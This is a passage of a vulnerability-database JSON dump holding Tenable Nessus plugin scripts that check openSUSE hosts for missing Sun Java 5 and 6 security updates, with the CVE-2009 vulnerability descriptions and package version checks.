5.0 For bug details\n use the CVE-ID to query the Mitre database at\n http://cve.mitre.org/cve please.", "edition": 25, "published": "2009-11-11T00:00:00", "title": "openSUSE Security Update : java-1_5_0-sun (java-1_5_0-sun-1529)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3864", "CVE-2009-3868"], "modified": "2009-11-11T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:java-1_5_0-sun-devel", "p-cpe:/a:novell:opensuse:java-1_5_0-sun-jdbc", "cpe:/o:novell:opensuse:11.0", "p-cpe:/a:novell:opensuse:java-1_5_0-sun", "p-cpe:/a:novell:opensuse:java-1_5_0-sun-alsa", "p-cpe:/a:novell:opensuse:java-1_5_0-sun-src", "p-cpe:/a:novell:opensuse:java-1_5_0-sun-plugin", "p-cpe:/a:novell:opensuse:java-1_5_0-sun-demo"], "id": "SUSE_11_0_JAVA-1_5_0-SUN-091109.NASL", "href": "https://www.tenable.com/plugins/nessus/42457", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update java-1_5_0-sun-1529.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(42457);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3864\", \"CVE-2009-3867\", \"CVE-2009-3868\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3872\", \"CVE-2009-3873\", \"CVE-2009-3874\", \"CVE-2009-3875\", \"CVE-2009-3876\", \"CVE-2009-3877\");\n\n script_name(english:\"openSUSE Security Update : java-1_5_0-sun (java-1_5_0-sun-1529)\");\n script_summary(english:\"Check for the java-1_5_0-sun-1529 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"java-1_5_0-sun u22 update fixes the following security bugs :\n\n - CVE-2009-3864: CVSS v2 Base Score: 7.5\n\n - CVE-2009-3867: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3868: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3869: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3871: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3872: CVSS v2 Base Score: 10.0\n\n - CVE-2009-3873: CVSS v2 Base Score: n/a\n\n - CVE-2009-3874: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3875: CVSS v2 Base Score: 5.0\n\n - CVE-2009-3876: CVSS v2 Base Score: 5.0\n\n - CVE-2009-3877: CVSS v2 Base Score: 5.0 For bug details\n use the CVE-ID to query the Mitre database at\n http://cve.mitre.org/cve please.\"\n );\n # http://cve.mitre.org/cve\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://cve.mitre.org/cve/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=552581\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1_5_0-sun packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java JRE AWT setDiffICM Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119, 189, 310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/11/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"java-1_5_0-sun-1.5.0_update22-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"java-1_5_0-sun-alsa-1.5.0_update22-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"java-1_5_0-sun-demo-1.5.0_update22-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"java-1_5_0-sun-devel-1.5.0_update22-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"java-1_5_0-sun-jdbc-1.5.0_update22-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"java-1_5_0-sun-plugin-1.5.0_update22-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"java-1_5_0-sun-src-1.5.0_update22-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1_5_0-sun\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:04:29", "description": "The Sun Java 6 SDK/JRE was updated to u17 update fixing bugs and\nvarious security issues :\n\nCVE-2009-3866:The Java Web Start Installer in Sun Java SE in JDK and\nJRE 6 before Update 17 does not properly use security model\npermissions when removing installer extensions, which allows remote\nattackers to execute arbitrary code by modifying a certain JNLP file\nto have a URL field that poi nts to an unintended trusted application,\naka Bug Id 6872824.\n\nCVE-2009-3867: Stack-based buffer overflow in the\nHsbParser.getSoundBank function in Sun Java SE in JDK and JRE 5.0\nbefore Update 22, JDK and JRE 6 before Update 17, SDK and JRE 1.3.x\nbefore 1.3.1_27, and SDK and JRE 1.4.x before 1.4.2_24 allows remote\nattackers to execute arbitrary code via a long file: URL in an\nargument, aka Bug Id 6854303.\n\nCVE-2009-3869: Stack-based buffer overflow in the setDiffICM function\nin the Abstract Window Toolkit (AWT) in Java Runtime Environment (JRE)\nin Sun Java SE in JDK and JRE 5.0 before Update 22, JDK and JRE 6\nbefore Update 17, SDK and JRE 1.3.x before 1.3.1_27, and SDK and JRE\n1.4.x before 1.4.2_ 24 allows remote attackers to execute arbitrary\ncode via a crafted argument, aka Bug Id 6872357.\n\nCVE-2009-3871: Heap-based buffer overflow in the setBytePixels\nfunction in the Abstract Window Toolkit (AWT) in Java Runtime\nEnvironment (JRE) in Sun Java SE in JDK and JRE 5.0 before Update 22,\nJDK and JRE 6 before Update 17, SDK and JRE 1.3.x before 1.3.1_27, and\nSDK and JRE 1.4.x before 1.4. 2_24 allows remote attackers to execute\narbitrary code via crafted arguments, aka Bug Id 6872358.\n\nCVE-2009-3874: Integer overflow in the JPEGImageReader implementation\nin the ImageI/O component in Sun Java SE in JDK and JRE 5.0 before\nUpdate 22, JDK and JRE 6 before Update 17, and SDK and JRE 1.4.x\nbefore 1.4.2_24 allows remote attackers to execute arbitrary code via\nlarge subsample dimensi ons in a JPEG file that triggers a heap-based\nbuffer overflow, aka Bug Id 6874643.\n\nCVE-2009-3875: The MessageDigest.isEqual function in Java Runtime\nEnvironment (JRE) in Sun Java SE in JDK and JRE 5.0 before Update 22,\nJDK and JRE 6 before Update 17, SDK and JRE 1.3.x before 1.3.1_27, and\nSDK and JRE 1.4.x before 1.4.2_24 allows remote attackers to spoof\nHMAC-based digital si gnatures, and possibly bypass authentication,\nvia unspecified vectors related to 'timing attack vulnerabilities,'\naka Bug Id 6863503.\n\nCVE-2009-3876: Unspecified vulnerability in Sun Java SE in JDK and JRE\n5.0 before Update 22, JDK and JRE 6 before Update 17, SDK and JRE\n1.3.x before 1.3.1 _27, and SDK and JRE 1.4.x before 1.4.2_24 allows\nremote attackers to cause a denial of service (memory consumption) via\ncrafted DER encoded data, which is not properly decoded by the ASN.1\nDER input stream parser, aka Bug Id 6864911.\n\nCVE-2009-3877: Unspecified vulnerability in Sun Java SE in JDK and JRE\n5.0 before Update 22, JDK and JRE 6 before Update 17, SDK and JRE\n1.3.x before 1.3.1 _27, and SDK and JRE 1.4.x before 1.4.2_24 allows\nremote attackers to cause a denial of service (memory consumption) via\ncrafted HTTP header s, which are not properly parsed by the ASN.1 DER\ninput stream parser, aka Bug Id 6864911.\n\nCVE-2009-3864: The Java Update functionality in Java Runtime\nEnvironment (JRE) in Sun Java SE in JDK and JRE 5.0 before Update 22\nand JDK and JRE 6 before Update 17, when a non-English version of\nWindows is used, does not retrieve available new JRE versions, which\nallows remote attackers to lev erage vulnerabilities in older releases\nof this software, aka Bug Id 6869694.\n\nCVE-2009-3865: The launch method in the Deployment Toolkit plugin in\nJava Runtime Environment (JRE) in Sun Java SE in JDK and JRE 6 before\nUpdate 17 allows remote attackers to execute arbitrary commands via a\ncrafted web page, aka Bug Id 6869752.\n\nCVE-2009-3868: Sun Java SE in JDK and JRE 5.0 before Update 22, JDK\nand JRE 6 before Update 17, SDK and JRE 1.3.x before 1.3.1_27, and SDK\nand JRE 1.4.x be fore 1.4.2_24 does not properly parse color profiles,\nwhich allows remote attackers to gain privileges via a crafted image\nfile, aka Bug Id 6862970.\n\nCVE-2009-3872: Unspecified vulnerability in the JPEG JFIF Decoder in\nSun Java SE in JDK and JRE 5.0 before Update 22, JDK and JRE 6 before\nUpdate 17, SDK a nd JRE 1.3.x before 1.3.1_27, and SDK and JRE 1.4.x\nbefore 1.4.2_24 allows remote attackers to gain privileges via a\ncrafted image file, aka Bug Id 6862969.\n\nCVE-2009-3873: The JPEG Image Writer in Sun Java SE in JDK and JRE 5.0\nbefore Update 22, JDK and JRE 6 before Update 17, and SDK and JRE\n1.4.x before 1.4.2 _24 allows remote attackers to gain privileges via\na crafted image file, related to a 'quanization problem,' aka Bug Id\n6862968.", "edition": 25, "published": "2009-11-19T00:00:00", "title": "openSUSE Security Update : java-1_6_0-sun (java-1_6_0-sun-1541)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3866", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3865", "CVE-2009-3877", "CVE-2009-3864", "CVE-2009-3868"], "modified": "2009-11-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:java-1_6_0-sun", "p-cpe:/a:novell:opensuse:java-1_6_0-sun-alsa", "p-cpe:/a:novell:opensuse:java-1_6_0-sun-devel", "cpe:/o:novell:opensuse:11.1", "p-cpe:/a:novell:opensuse:java-1_6_0-sun-src", "p-cpe:/a:novell:opensuse:java-1_6_0-sun-plugin", "p-cpe:/a:novell:opensuse:java-1_6_0-sun-jdbc"], "id": "SUSE_11_1_JAVA-1_6_0-SUN-091113.NASL", "href": "https://www.tenable.com/plugins/nessus/42853", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update java-1_6_0-sun-1541.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(42853);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3864\", \"CVE-2009-3865\", \"CVE-2009-3866\", \"CVE-2009-3867\", \"CVE-2009-3868\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3872\", \"CVE-2009-3873\", \"CVE-2009-3874\", \"CVE-2009-3875\", \"CVE-2009-3876\", \"CVE-2009-3877\");\n\n script_name(english:\"openSUSE Security Update : java-1_6_0-sun (java-1_6_0-sun-1541)\");\n script_summary(english:\"Check for the java-1_6_0-sun-1541 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Sun Java 6 SDK/JRE was updated to u17 update fixing bugs and\nvarious security issues :\n\nCVE-2009-3866:The Java Web Start Installer in Sun Java SE in JDK and\nJRE 6 before Update 17 does not properly use security model\npermissions when removing installer extensions, which allows remote\nattackers to execute arbitrary code by modifying a certain JNLP file\nto have a URL field that poi nts to an unintended trusted application,\naka Bug Id 6872824.\n\nCVE-2009-3867: Stack-based buffer overflow in the\nHsbParser.getSoundBank function in Sun Java SE in JDK and JRE 5.0\nbefore Update 22, JDK and JRE 6 before Update 17, SDK and JRE 1.3.x\nbefore 1.3.1_27, and SDK and JRE 1.4.x before 1.4.2_24 allows remote\nattackers to execute arbitrary code via a long file: URL in an\nargument, aka Bug Id 6854303.\n\nCVE-2009-3869: Stack-based buffer overflow in the setDiffICM function\nin the Abstract Window Toolkit (AWT) in Java Runtime Environment (JRE)\nin Sun Java SE in JDK and JRE 5.0 before Update 22, JDK and JRE 6\nbefore Update 17, SDK and JRE 1.3.x before 1.3.1_27, and SDK and JRE\n1.4.x before 1.4.2_ 24 allows remote attackers to execute arbitrary\ncode via a crafted argument, aka Bug Id 6872357.\n\nCVE-2009-3871: Heap-based buffer overflow in the setBytePixels\nfunction in the Abstract Window Toolkit (AWT) in Java Runtime\nEnvironment (JRE) in Sun Java SE in JDK and JRE 5.0 before Update 22,\nJDK and JRE 6 before Update 17, SDK and JRE 1.3.x before 1.3.1_27, and\nSDK and JRE 1.4.x before 1.4. 2_24 allows remote attackers to execute\narbitrary code via crafted arguments, aka Bug Id 6872358.\n\nCVE-2009-3874: Integer overflow in the JPEGImageReader implementation\nin the ImageI/O component in Sun Java SE in JDK and JRE 5.0 before\nUpdate 22, JDK and JRE 6 before Update 17, and SDK and JRE 1.4.x\nbefore 1.4.2_24 allows remote attackers to execute arbitrary code via\nlarge subsample dimensi ons in a JPEG file that triggers a heap-based\nbuffer overflow, aka Bug Id 6874643.\n\nCVE-2009-3875: The MessageDigest.isEqual function in Java Runtime\nEnvironment (JRE) in Sun Java SE in JDK and JRE 5.0 before Update 22,\nJDK and JRE 6 before Update 17, SDK and JRE 1.3.x before 1.3.1_27, and\nSDK and JRE 1.4.x before 1.4.2_24 allows remote attackers to spoof\nHMAC-based digital si gnatures, and possibly bypass authentication,\nvia unspecified vectors related to 'timing attack vulnerabilities,'\naka Bug Id 6863503.\n\nCVE-2009-3876: Unspecified vulnerability in Sun Java SE in JDK and JRE\n5.0 before Update 22, JDK and JRE 6 before Update 17, SDK and JRE\n1.3.x before 1.3.1 _27, and SDK and JRE 1.4.x before 1.4.2_24 allows\nremote attackers to cause a denial of service (memory consumption) via\ncrafted DER encoded data, which is not properly decoded by the ASN.1\nDER input stream parser, aka Bug Id 6864911.\n\nCVE-2009-3877: Unspecified vulnerability in Sun Java SE in JDK and JRE\n5.0 before Update 22, JDK and JRE 6 before Update 17, SDK and JRE\n1.3.x before 1.3.1 _27, and SDK and JRE 1.4.x before 1.4.2_24 allows\nremote attackers to cause a denial of service (memory consumption) via\ncrafted HTTP header s, which are not properly parsed by the ASN.1 DER\ninput stream parser, aka Bug Id 6864911.\n\nCVE-2009-3864: The Java Update functionality in Java Runtime\nEnvironment (JRE) in Sun Java SE in JDK and JRE 5.0 before Update 22\nand JDK and JRE 6 before Update 17, when a non-English version of\nWindows is used, does not retrieve available new JRE versions, which\nallows remote attackers to lev erage vulnerabilities in older releases\nof this software, aka Bug Id 6869694.\n\nCVE-2009-3865: The launch method in the Deployment Toolkit plugin in\nJava Runtime Environment (JRE) in Sun Java SE in JDK and JRE 6 before\nUpdate 17 allows remote attackers to execute arbitrary commands via a\ncrafted web page, aka Bug Id 6869752.\n\nCVE-2009-3868: Sun Java SE in JDK and JRE 5.0 before Update 22, JDK\nand JRE 6 before Update 17, SDK and JRE 1.3.x before 1.3.1_27, and SDK\nand JRE 1.4.x be fore 1.4.2_24 does not properly parse color profiles,\nwhich allows remote attackers to gain privileges via a crafted image\nfile, aka Bug Id 6862970.\n\nCVE-2009-3872: Unspecified vulnerability in the JPEG JFIF Decoder in\nSun Java SE in JDK and JRE 5.0 before Update 22, JDK and JRE 6 before\nUpdate 17, SDK a nd JRE 1.3.x before 1.3.1_27, and SDK and JRE 1.4.x\nbefore 1.4.2_24 allows remote attackers to gain privileges via a\ncrafted image file, aka Bug Id 6862969.\n\nCVE-2009-3873: The JPEG Image Writer in Sun Java SE in JDK and JRE 5.0\nbefore Update 22, JDK and JRE 6 before Update 17, and SDK and JRE\n1.4.x before 1.4.2 _24 allows remote attackers to gain privileges via\na crafted image file, related to a 'quanization problem,' aka Bug Id\n6862968.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=552586\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1_6_0-sun packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java JRE AWT setDiffICM Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94, 119, 189, 264, 310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/11/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_6_0-sun-1.6.0.u17-1.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_6_0-sun-alsa-1.6.0.u17-1.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_6_0-sun-devel-1.6.0.u17-1.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_6_0-sun-jdbc-1.6.0.u17-1.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_6_0-sun-plugin-1.6.0.u17-1.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_6_0-sun-src-1.6.0.u17-1.1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1_6_0-sun\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:05:45", "description": "The Sun Java 6 SDK/JRE was updated to u17 update fixing bugs and\nvarious security issues :\n\nCVE-2009-3866:The Java Web Start Installer in Sun Java SE in JDK and\nJRE 6 before Update 17 does not properly use security model\npermissions when removing installer extensions, which allows remote\nattackers to execute arbitrary code by modifying a certain JNLP file\nto have a URL field that poi nts to an unintended trusted application,\naka Bug Id 6872824.\n\nCVE-2009-3867: Stack-based buffer overflow in the\nHsbParser.getSoundBank function in Sun Java SE in JDK and JRE 5.0\nbefore Update 22, JDK and JRE 6 before Update 17, SDK and JRE 1.3.x\nbefore 1.3.1_27, and SDK and JRE 1.4.x before 1.4.2_24 allows remote\nattackers to execute arbitrary code via a long file: URL in an\nargument, aka Bug Id 6854303.\n\nCVE-2009-3869: Stack-based buffer overflow in the setDiffICM function\nin the Abstract Window Toolkit (AWT) in Java Runtime Environment (JRE)\nin Sun Java SE in JDK and JRE 5.0 before Update 22, JDK and JRE 6\nbefore Update 17, SDK and JRE 1.3.x before 1.3.1_27, and SDK and JRE\n1.4.x before 1.4.2_ 24 allows remote attackers to execute arbitrary\ncode via a crafted argument, aka Bug Id 6872357.\n\nCVE-2009-3871: Heap-based buffer overflow in the setBytePixels\nfunction in the Abstract Window Toolkit (AWT) in Java Runtime\nEnvironment (JRE) in Sun Java SE in JDK and JRE 5.0 before Update 22,\nJDK and JRE 6 before Update 17, SDK and JRE 1.3.x before 1.3.1_27, and\nSDK and JRE 1.4.x before 1.4. 2_24 allows remote attackers to execute\narbitrary code via crafted arguments, aka Bug Id 6872358.\n\nCVE-2009-3874: Integer overflow in the JPEGImageReader implementation\nin the ImageI/O component in Sun Java SE in JDK and JRE 5.0 before\nUpdate 22, JDK and JRE 6 before Update 17, and SDK and JRE 1.4.x\nbefore 1.4.2_24 allows remote attackers to execute arbitrary code via\nlarge subsample dimensi ons in a JPEG file that triggers a heap-based\nbuffer overflow, aka Bug Id 6874643.\n\nCVE-2009-3875: The MessageDigest.isEqual function in Java Runtime\nEnvironment (JRE) in Sun Java SE in JDK and JRE 5.0 before Update 22,\nJDK and JRE 6 before Update 17, SDK and JRE 1.3.x before 1.3.1_27, and\nSDK and JRE 1.4.x before 1.4.2_24 allows remote attackers to spoof\nHMAC-based digital si gnatures, and possibly bypass authentication,\nvia unspecified vectors related to 'timing attack vulnerabilities,'\naka Bug Id 6863503.\n\nCVE-2009-3876: Unspecified vulnerability in Sun Java SE in JDK and JRE\n5.0 before Update 22, JDK and JRE 6 before Update 17, SDK and JRE\n1.3.x before 1.3.1 _27, and SDK and JRE 1.4.x before 1.4.2_24 allows\nremote attackers to cause a denial of service (memory consumption) via\ncrafted DER encoded data, which is not properly decoded by the ASN.1\nDER input stream parser, aka Bug Id 6864911.\n\nCVE-2009-3877: Unspecified vulnerability in Sun Java SE in JDK and JRE\n5.0 before Update 22, JDK and JRE 6 before Update 17, SDK and JRE\n1.3.x before 1.3.1 _27, and SDK and JRE 1.4.x before 1.4.2_24 allows\nremote attackers to cause a denial of service (memory consumption) via\ncrafted HTTP header s, which are not properly parsed by the ASN.1 DER\ninput stream parser, aka Bug Id 6864911.\n\nCVE-2009-3864: The Java Update functionality in Java Runtime\nEnvironment (JRE) in Sun Java SE in JDK and JRE 5.0 before Update 22\nand JDK and JRE 6 before Update 17, when a non-English version of\nWindows is used, does not retrieve available new JRE versions, which\nallows remote attackers to lev erage vulnerabilities in older releases\nof this software, aka Bug Id 6869694.\n\nCVE-2009-3865: The launch method in the Deployment Toolkit plugin in\nJava Runtime Environment (JRE) in Sun Java SE in JDK and JRE 6 before\nUpdate 17 allows remote attackers to execute arbitrary commands via a\ncrafted web page, aka Bug Id 6869752.\n\nCVE-2009-3868: Sun Java SE in JDK and JRE 5.0 before Update 22, JDK\nand JRE 6 before Update 17, SDK and JRE 1.3.x before 1.3.1_27, and SDK\nand JRE 1.4.x be fore 1.4.2_24 does not properly parse color profiles,\nwhich allows remote attackers to gain privileges via a crafted image\nfile, aka Bug Id 6862970.\n\nCVE-2009-3872: Unspecified vulnerability in the JPEG JFIF Decoder in\nSun Java SE in JDK and JRE 5.0 before Update 22, JDK and JRE 6 before\nUpdate 17, SDK a nd JRE 1.3.x before 1.3.1_27, and SDK and JRE 1.4.x\nbefore 1.4.2_24 allows remote attackers to gain privileges via a\ncrafted image file, aka Bug Id 6862969.\n\nCVE-2009-3873: The JPEG Image Writer in Sun Java SE in JDK and JRE 5.0\nbefore Update 22, JDK and JRE 6 before Update 17, and SDK and JRE\n1.4.x before 1.4.2 _24 allows remote attackers to gain privileges via\na crafted image file, related to a 'quanization problem,' aka Bug Id\n6862968.", "edition": 25, "published": "2009-11-19T00:00:00", "title": "openSUSE Security Update : java-1_6_0-sun (java-1_6_0-sun-1541)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3866", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3865", "CVE-2009-3877", "CVE-2009-3864", "CVE-2009-3868"], "modified": "2009-11-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:java-1_6_0-sun", "p-cpe:/a:novell:opensuse:java-1_6_0-sun-alsa", "p-cpe:/a:novell:opensuse:java-1_6_0-sun-devel", "p-cpe:/a:novell:opensuse:java-1_6_0-sun-src", "cpe:/o:novell:opensuse:11.2", "p-cpe:/a:novell:opensuse:java-1_6_0-sun-plugin", "p-cpe:/a:novell:opensuse:java-1_6_0-sun-demo", "p-cpe:/a:novell:opensuse:java-1_6_0-sun-jdbc"], "id": "SUSE_11_2_JAVA-1_6_0-SUN-091113.NASL", "href": "https://www.tenable.com/plugins/nessus/42855", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update 